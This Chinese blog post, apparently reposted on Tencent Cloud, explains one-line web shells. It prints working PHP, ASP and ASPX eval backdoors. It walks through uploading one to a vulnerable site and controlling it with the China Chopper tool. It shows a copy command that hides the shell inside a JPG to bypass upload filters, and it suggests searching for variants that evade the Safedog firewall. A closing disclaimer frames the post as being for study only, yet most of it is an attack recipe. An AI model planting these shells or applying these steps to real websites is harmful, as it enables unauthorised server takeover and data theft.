前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >一句话木马与中国菜刀

一句话木马与中国菜刀

作者头像
mathor
发布2018-10-10 10:26:51
9.1K0
发布2018-10-10 10:26:51
举报
文章被收录于专栏:mathor
什么是一句话木马?

 一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下

代码语言:javascript
复制
php:<?php @eval($_post['pass']);?>
asp:<%eval request ("pass")%>
aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

 这里没有放jsp的一句话木马,因为jsp的一句话比较复杂,想看的可以看这篇文章

一句话木马的使用

 以php一句话为例,我们可以直接将这些语句插入到网站的某个php文件上,或者直接创建一个新的文件,在文件里写入一句话木马,然后把文件上传到网站上即可。

 假设有个智障网站有这样的漏洞:

 我们把这个phpma.php上传上去后,打开中国菜刀,在空白处鼠标右键,选择“添加选项”

 编辑相关参数,包括一句话木马所在的URL以及密码,最后点击“编辑”

 在URL中选中目标网站,点击鼠标右键,选择“文件管理”,就能看到网站的目录结构了

 获取整个网站的目录了~然后就可以开始做坏事

图片一句话制作

 如果网站限制了上传类型,.asp,.php上传不上出,但是可以上传图片,那么就可以使用图片隐写术将一句话木马安插在图片里,具体操作步骤是:  首先准备好一张图片,一个一句话木马,以及同路径下的dos窗口

 然后输入DOS命令:copy 1.jpg+1.php 2.jpg

 此时产生的2.jpg就是我们要的图片一句话木马

总结

 其他类型的一句话木马也是一样的使用方法。当然,一般网站不可能这么容易就上传,肯定有防护机制,比方说安全狗防护,这时可以去网上搜过狗一句话等等。本博客仅供学习交流使用,不可用于任何违法行为中,学信息安全,保卫我国信息安全,爱我中国~

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-10-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 什么是一句话木马?
  • 一句话木马的使用
  • 图片一句话制作
  • 总结
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档